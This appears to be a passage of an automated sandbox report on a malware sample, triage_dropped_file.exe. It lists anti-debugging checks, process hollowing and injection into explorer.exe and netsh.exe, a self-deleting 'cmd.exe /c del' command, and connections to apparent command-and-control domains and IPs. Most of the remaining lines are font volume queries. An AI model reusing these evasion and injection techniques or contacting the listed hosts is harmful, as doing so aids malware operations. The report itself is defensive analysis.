          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0330740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0330740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0330740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0325746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0326A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_0324849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_032B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 21_2_03308CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\triage_dropped_file.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\triage_dropped_file.exeCode function: 5_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\Desktop\triage_dropped_file.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe; Network Connect: 104.21.22.47 80
          Source: C:\Windows\explorer.exe; Domain query: www.inspectdecided.xyz
          Source: C:\Windows\explorer.exe; Network Connect: 188.114.96.7 80
          Source: C:\Windows\explorer.exe; Domain query: www.fengyat.club
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 11F0000
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\netsh.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\netsh.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\netsh.exe; Section loaded: unknown target: unknown protection: read write
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Memory written: C:\Users\user\Desktop\triage_dropped_file.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Thread register set: target process: 3472
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\netsh.exe; Thread register set: target process: 3472
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Process created: C:\Users\user\Desktop\triage_dropped_file.exe C:\Users\user\Desktop\triage_dropped_file.exe
          Source: C:\Windows\SysWOW64\netsh.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\triage_dropped_file.exe"
          Source: explorer.exe, 0000000C.00000000.323379874.0000000005EA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.319947528.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.296362261.00000000089FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.303156441.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.288509510.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.326748395.00000000089FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.348634917.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.313706142.00000000089FF000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000C.00000000.319947528.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.303156441.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.288509510.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.348634917.0000000001640000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
          Source: explorer.exe, 0000000C.00000000.319947528.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.303156441.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.288509510.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.348634917.0000000001640000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: SProgram Managerl
          Source: explorer.exe, 0000000C.00000000.287389858.0000000001128000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.319675230.0000000001128000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.348327898.0000000001128000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.302787668.0000000001128000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 0000000C.00000000.319947528.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.303156441.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.288509510.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.348634917.0000000001640000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 0000000C.00000000.319947528.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.303156441.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.288509510.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.348634917.0000000001640000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Users\user\Desktop\triage_dropped_file.exe VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exe; Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\triage_dropped_file.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
